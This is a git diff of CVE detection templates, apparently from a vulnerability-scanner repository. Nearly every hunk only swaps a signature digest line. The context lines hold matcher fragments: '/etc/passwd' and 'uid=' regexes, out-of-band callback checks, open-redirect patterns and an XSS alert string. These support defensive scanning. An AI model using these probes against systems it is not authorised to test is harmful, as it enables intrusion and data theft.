4a0a00473045022100c94b52f78654d00b5f7b0ce9706c6e96b0336b8ef8ed4d176f8e3787a6ea01d002203dd60ec8e93166cb8ed798255a4ee8aa0ef131b1b87ace2031d06331b67d6ddc:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022036b5c475e7a2def53422b62dc30e614d062d62d39e0ea2982517c281766fb21e022015f8607a592959b4199c9500b61a365684dd0ca7a17f6f77bf2ae09241fb28d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 5263bbff5f..90027280df 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -59,5 +59,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and - -# digest: 4a0a00473045022100f5b7bdeb982779135565aea841f89975e99ec63d71610601a552c56acf2bcbe802200a09f977cc5ca9a9412d8f6857b2f1dc625e6137d6e44ac1ba67a2cfd9c3ddf5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009807372c21584d5185fc9e59ae339c4f7431cadf7298f1d6b30fdf2321903d86022100c505a8c6aeb67d44a4ed6c83797b214c73888c061473905872642ec4407535cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index a51546e36c..afc95c8855 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -59,5 +59,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and - -# digest: 4a0a004730450220768812d9a88b94a17d8ee81a2b3037c6ac2024b0d14bd10bbad71d0d1eca9fb3022100e95e6c10bed0aee775cd063ae21e95de2e39ecdc9d919589b7b03f3e3a68fcef:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022070cf8b089880a7ba7cfb7dd258ca8c62b28e6f095af7e408074e0a0bcc650aaa022002a2011363ef0d6b6945397f59bf1a5daa9bca426019f38a34e6a908a7781b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 3055864e17..8e97411281 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -59,5 +59,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and - -# digest: 4a0a00473045022100c27cf66194802f16c9e9c782f06e71a5255b49d46446e28ba075b3612a1f89770220614a00a9ca49c3a671739d1e619a921e8338846205363813aab7f2a212d976f2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fe2fbad8ce104cf581bc30f7e11b2a8fc30322e207ffc1062abbbd8c3a947593022100a2cf88cf4f5fbf5078b5c0e418fcd266c7a3324cd56e1d67bac54899f94f81a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 7b52aa4170..d052acf1b1 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -59,5 +59,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, " Test")' condition: and - -# digest: 490a00463044022007d488d5d066dc84dc97aefcf828dbf60f725247679060f50f8e36e21a14201802201575d7924d84753626f5383eb3411c95b3282efbef623ada03f166467c3538a4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022052af83710d3c7d07583055682f14c7691d8c11a091f362b67aa9d8deb3b0c62e02201cb6a7199a47e0bcf871a5b721d488f4b0440e7a200ae99b808bde3ba2ca1658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index fa4d8155ea..cedf303b03 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -46,5 +46,4 @@ http: dsl: - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" - -# digest: 490a00463044022032e4db5ee26bdf66ee0cc1b5b9e1e991bb931a83f65a697e496a755ff9b389a202200761fe59791dd6489a218921be2c275157ef440d12295ce7a5a707d82f0efa3e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022019c4336bb4e75faefa6931e627923cf505d1f0ca85025caa89d4ba7daaf188da022100de8bba89f26f437b1feb440f48709f55be6901dc9fc7bc766f8e18d9d2ea8154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 4d0fe96864..cfd86c846c 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100d8142df7f2cf83f23748442d962a97557fdb2ff1125b8057f1ef5716013ba636022100c883f8321ad17ec647e94e109d074c91a1e6e8c0253b9732b324e45949dea7be:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207558ac0ed565b474da7167518cd32e5f293f66e54d98165242d01794e29f7d0f02210090d3935864c541d96d9dd0749f652c763f9508c5668375da24b51524d02c2100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 204ab50e65..7a20fa78e1 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -37,5 +37,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a0047304502205e727358ec3dcc922a8d905ab0a643e45ec5560a987811cb9296af93c3a29d8d022100d2b892fb39787902c240d2e2a0e8ba238fd392b545723429c4c0c4d1fe92525a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ca730db728cf6c4a2487cf1072afba0f74ebf6626ef67ee8db222dc55c43814f0220589be76dbcdd87891af69cfc3c1bb64453a028129d7dca9d0bf9a6c9ae62e409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 9ca7df28c6..3b91006053 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c478f3e0aca126ed1324c53be27b7215c82199209b6954c167a7175991f32cfd022100fc63e0f3305da73b88c648a95c8f342928663b86a6a2b1469b65e688438a8c45:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207d9e9369dbb242160b5265a03b82a9fb5a6282fdba9bd5671052d1d7d5afb1f102203a739f15e72c55a8865934867107042155a572ccd8c2e9d2692d1f4a0d125b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 77d0b7cbf1..bfefcd3938 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -39,5 +39,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022100edac9b6a91fe458388429fc61ed542db7a06ca72e860ec0bc31d235d01edb30a02204870837543bcdb5f1aa07068aa4318856c1f6e606e24c2d1c9e25192879ba5a8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022037c07fcfa0a69a6423e615c9a21eb41b5494c1d19f4f3d41ad95e4c045e84496022100f9f9b1b6f0b6e3a8ded264e957259c70d17dbc8b587ad5ab275efe0b854a20ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index d4bf978adf..5c9a6e6b22 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -49,5 +49,4 @@ http: part: interactsh_protocol words: - "dns" - -# digest: 4a0a00473045022100f43bc8a7ea0b324054ddde704cb2300c962061bf08f292cdcfed88d1dfe1ca6702205bc5ef70257aa188d0f02114ab8261a89b1bf3943cc84d72e98c4b0f0536ca78:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100afa80223a3426d2a422e57f9c26a6a467ae17f8a4d54234baaf50c0915f88e92022046b7da5de1e79d4677c71c7d77706d1c468bb085c11a00a60cca34b32167f65e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 3da23216bc..6a6c1d8a52 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -47,5 +47,4 @@ http: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404" - -# digest: 490a0046304402205da3102d5703aa9ec0dca4ffa21df40ae0f7ecc7e6cd3e3e67310e19a5a9509e022002fdadced6e693e74347e9f6158f26fa44d60bdbe665da6c9b84167bcd4ff70e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220395282ebb04fcd10d8251cc356d87346590e958fe3f6d4578226070245ccdc07022100fe147dd35454a86a5dc2ed3c803b443e26581517dd005fe17048faf48106b288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 3cd333e8b8..16e60e1264 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -56,5 +56,4 @@ http: regex: - uid=(\d+)\((\w+)\) part: body - -# digest: 4b0a004830460221009089797126e1d990a0281bec72bc9bbd6514e74ce164cb56be1e084870422520022100a0d02db96abe37c4387fb684defcdf3bbe2fa6f88195aee45aa5213ba4ce8212:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100afde19dccdae76a4e6940f8c4aad9cc203f640adc8055669b3b1014a6745873a02204f1c32d4a219702010cbe05fdbfc0da6547ccb958a7ac6b7e9d0fddd3a4a90be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 91d368a319..1414947839 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c08c5376569e9a03a91ae47657e22b79815a500f0f54665caf28b1c03cfb801d022076ed2f2deff8163198ebae4a71aaeceb2dacbd60bc3eb313cc5e79ddf57c668a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220599f8fbcdb9c3e7dc79c2558acbec83f6f4fbbf8231ec00988b19a737d77ac0b022100896bd60e0afb8e52976dc508036e523279a0920bb0b25b218a26f6c65c84e5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 05a6b844c8..93b24f1f4b 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202a9ee81a3f837c8379c66660ec58b39029cca10f80153d75789bc1340bf3b20802206ec45becfee38f971b6dc1cf0166ffb0a715981f255341a6be001e04fd7b6874:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b1d845f2c7e1ffa3cf7e6caf2a0f1034f47194cdaf0e25927f59fbd95c9bf186022100eba849cd82b30a80e9a0d9743fea8c4c99662e6d07881dba7e472c09346aa38e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index e9d93270bf..dd9e3185b1 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c85522f14530ac4dc5dffa826322d4182f6d08928e20cf1d5b1d13c3238f61cc02210084d8796758be6ad7c455e59d18646c1009cfa5da4e48c942a0c67df742eaa5a1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f7f49fa896b28a9eaa2cfcca0f261c93b89d406652ce199d0a076dfe7b3bfaed022100f1e1b20522297b4a6f5ab2bbbff22713cebf98de9f80b63e439e323e57398446:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index 5d6b8a2a7a..d88bc4d776 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206d5d08f088d89b2e5bd476908e1554be1dcd460bafb37efc89c733b769b5a142022100baeff9b5c4ce59e40fe800dbfd6aced07cd3722952b23a51a0c9a01d17e41500:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b8f2778138b6c69c252aebc8856a94e8cc6dadc2c25452c0c8620f034ab53f7b02206a2b3aab6b47ac20b1543426d430d16dfb0fc54c7339cdef4f6b26d46fa4ffa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index 7e0354560c..434de6c60b 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a13f4a713c80b7a40c9424649d4cd030a743b8f0e80898d28aad67a921513d63022100a856ec75ddd6ff216da97af29f68e4eb6e9bacd52080c971f55bcf1e0380f55f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207d9241aa2f27b26f84f3897382ac0dcaca41593677d7fad79ee6a139f8bf22bb022100e2786cad0f026c44661dd61f18aed1c7de31a608aa9b15aab041c227574678ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index 18b0a7b0f6..ed5e5d62a6 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4b0a00483046022100a3073ee70aa02d0a9e6482b80ea70c0c244f1617160ccf358ab0a8ef29439b55022100d91aed462aa7f45d1c8c80578eaed7e6d17967ec1bcfea14ee71857c4d4e6ce4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dc3cdc5db9acd0ae2b199d3e31943602d9b8553bcd5ed5bef83a7212e057a50a022100cdae33e950be56af04334ad4f9c356606dd58d7c8984cbc44ebd79c496ec9601:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 4ca525a6be..a3d2bd3826 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f6a45e9bca1543539c5bfa86431fd6d5d4d8d54783750d5b4185abd6ef1decac022100fd5b9fe4c652fc7b80fbe4e2fea5e1991fde5cebf1f3750856ef7348351086f1:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220416ddb9a9a7130b0847cb5335ee909c5d2e1cdfd7512c8c6537748f92a9ab0570220596b521d101eed04d3df21866dde5db53dc93650b1037d7b9f83d667bd0bd374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index 3df08c721e..93f7f30124 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d8c0cdb430b7dde5defa95667651f8c4e6b282d28cd95954fb5abd4a6f9f346402202b9285c49d3764c17e544d6f2d529bf2442c59896612cb0bdf012c704bbbad71:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022039954a269e77134daa2040c9bc79219720a0fcb4ac0d48dbfefc9e0eec7b796d02210092fee91370f181a2cb13f8bfc2cc5053b71acd3b9f4f66abee1fd573dd5f49e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index 67eff0244a..fd97b88a91 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -44,5 +44,4 @@ http: part: header words: - text/html - -# digest: 4a0a00473045022100fcbb52c40ae359688e4ddf9105db3734ba8f85b0ae7957f8b6685996e90c14c7022059a0e8131b6fe4b23c8932acb84918ff8cf997c421aa7445641329149a385ea5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205521cc18fb40d542f47d8fc49dec2a9433103990d3f059cf2486483157d3e561022100c5e097f4737683bd8d5e5813de723490edd36bf6e6808d2950687c65336c10d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 85d5294977..c572b63f9c 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "onanimationstart=alert(document.domain)")' - 'contains(body_2, "newstatpress_page")' condition: and - -# digest: 4a0a004730450220224a9adf917c864f1b2d6739e45192e2b0906a8958256fc9c3dffc1297f524d5022100af6460bc7ac17ee835193eed6f4ce534a72fae6d167bd564df85143e8c2d6b84:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022053b34f645512101af0a9a395ec5590ef3f1ee6b7d4e0e7a27ae66b429b5ba8c1022019d3baf4bb4a10ae22b20848d847efe02797a4566650e9837b460e0a56aec6ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index 7cb6c81003..a4644ac5ee 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d2f5344989cfa40ce90ffc93e16c8cbbe3b00775428a33b0f9108a79cd424cd70221008f2fcf9f441d18302703e52c1fce268cbd6198f6bc861b2cd7f612e5890f1aaf:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207cba6f219c7a0300d026878ea666a2d092070dae0683133e304287fa9225296702202a9f5ab3031439c3c0840b66f388b24ac40d43e446c0866a44db535369307bba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 4aeb437aa6..e437977e83 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203408f5aca4d6746c5c020bcdd3a6dc37bc0a3d1b4837143ae9d9b3c49ebcc36a022100ce3575a01c38646c6660456aeea9cf8bd55388f14dd00d8af5a348f11844e302:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206d7626f9c9514d385e7ae75dea97ee9819bbced59232229e83b80f1ea9f91353022100a5ac81fca7dabbe90a8ea1ebcf335a6018579693d61dd2923e21ed7cfacdb8f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index 5771640e36..f485d5fc26 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022025a92b9316f1a6d66f63e565b89d930a03e06e03ff0c98743e03495e40bf846b022038265fab54e5f1a73092373801f4a9932ac9121f30c777bc338b0393ef9fa078:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205bd7893ec30851a2977ae7a69cb95fec03e8ba60c89c0a4783b519db1214e192022100e45696d1770185316c607c279565e302940b3c8b69b953acf7a66eddf60d9c5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 7a55a55c4b..32ea9be225 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -56,5 +56,4 @@ http: - 'nonce":"([0-9a-z]+)' internal: true part: body - -# digest: 490a00463044022041a1b8afa2cf5d0ca707fb9890d9287c4e12a53b8c848ea2ba840f6df7aedeb1022075d00d38b236d8fe86392192b3f216e77f87b16d10b37656ee199ba6b4d5d968:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203d2d8311b39148317f3ed220e7bb028ead606a4b6b4dcda36760c1e5890642d9022100de737b8fb01b244d4c7aac6052621f265b7387e1ad2c20cdf5a0bfa9d4f22924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 4ef8ed4740..b7464776bd 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -50,5 +50,4 @@ http: - 'contains_all(body_2, "first name", "last name", "email")' - 'contains(content_type_2, "application/octet-stream")' condition: and - -# digest: 490a00463044022014010e7d335f3dce6b75c96e3a28331d6d8766b01e288df29be462861e69d56e02202211b44353e0ab9ca35306c2c4d2127b85c699f4d414126e0a61ee3d512a3fdd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a4e54763b9c32db21d47b258ea01ae03394284e9f27ec2cbf666d82b6b0fc6a6022100d7086e8f83e25568d2d7e39ef7a09b5868b2e19fb2f3145ab33c3cd9cadbe3b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index 1c9736431a..f413ae441c 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022034d87371200285f4f09f9ca521138016cdac348124467584f03822d668c1a72c02210089d4f23cd184f79efd16e07ede8cbbc0bcf72e99fd73540021b8a9bf7d2d9b5c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201df01d08f2e69dcf7104a66073916aa34b181494fb3fd4872112c1a9ca5ad118022100b931f8a9ec82462915e243b16042f41b49d9f6b46ee9d484a999b656ecef3184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index bc64d11a44..9e0cdbbb57 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022006c478b06ef014032508ca754688df26c8f1e8bdc06d0b0c6b1813de3d3be294022062ff24d7019b950513e21307fb06b76bb45772e771db39fb3d1ff507ac2414bf:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c9a7923941a77656126f375d8e239161d1fa288fbeaad388200345f520286b6c022100c0b002a27b209e865a98177ec04ee46ce955fbbc68d3f38610053c09c800bf0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index f1b79d63d6..5de54846af 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207992269f883da7f7cd0066d4cf78bdb7066d467f07e59a5de91a209ceb35726b02200dcd5eba1194721a132dc152b416030f0fbcd8929ab7edf391698db51f408b54:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220256d77cb5499bced2d78fe57d3cf9bae19ebc502b4e610fa8082380bb1dafcc7022100afb302ae0f7c7adccd88c7f12ec92a837d86bf26f5ef88ac0c17de9cdee15f37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index a99043f64f..28f730ddb1 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022051f005a559ed4c1f67a84a87a3274a46534792a55f0a372295c20bbd295e01d0022100d547a6bb8e7bcbe17685f1ff3b90c6f5ef86b238517ffed157e5b98fcbcc5f87:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204de81fbc55affa42b4d1a7a834d2d96a1162a6b28e181d37394af66b08c6b9e5022018cd55729fd2c5f76e1b2066cf1e807674145a07fc85d09f8c6a58e50ef58631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index 7e07a63888..be10e3f0e9 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200291e7a3a0b3ad04a5ef00cdfb87c084319265c46abc0f3ba2b3a52225306ae8022100a9ed9c42edab61842ea7728dd9c8dfc336defd8b6d48bc7aa2f5cab09819b4fc:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204416c5f43124eba5dc56066438d3049171c15c40c41f6b833c96175bab47113302206938eff9461993e7dfed7d01a7a8a685e72ded41d13daf03230e57d308866ef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 3b200fd87a..419ca85f6e 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -48,5 +48,4 @@ http: part: body_2 words: - "2ef3baa95802a4b646f2fc29075efe34" - -# digest: 4b0a004830460221008a1640e2f80a4258ffaa492d125cbdbaf34789ff171fff9f63514fca2b22d7de022100cec65c916d50e2877f0eea4c452428eb81408cdc91466a877ff8067732bb0436:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f7def73516987cddca41d1d7d1a8035b4fce5d1c964822519b4432556f00c0f3022100a1774fc0ae92904de3c568135cd6e389c3fd9e53e451f8bf4ee75dedf592a580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 88b5bd3a05..65cac2c5bc 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -45,5 +45,4 @@ http: - 'status_code == 200' - 'contains(body, "\"data\":{\"success\":true}")' condition: and - -# digest: 490a0046304402207eb599e3ec8c8388a8c577f8a01e800298550913cdc55ab124fe1ea7067423a102205925f2404260af74bedbc4dd2890e0fe5082759bba7970dd10fa73858d44182b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f4f4d5745f042546a48457f7c70474f6f8ab6cfb9e75695e9ef19e0f93fcc75022067310afca51c19a9e92740d9bef4119f108ac2bfa49f452afedd8538e6c093ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 11a9cd8691..dc76fd45ae 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bc57fdbfcbe8624ed405d5e2161236a714e713ce91aa5ae8ead2f386cff6f6c7022100dbe3b46ebb232df485f9151ab44789fee88c0a0a66c7910f85f3ce1c3ced8d6d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b5c0807c6764d78bafd2001d4fa783dff054061f3252eea04bdec1b85ea260cb02202cfd0bc535ad62fcc47e02633584cce8e2c74dc207d10039a89b8cf959bc5c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index c82546c9f0..1b58a4c90c 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 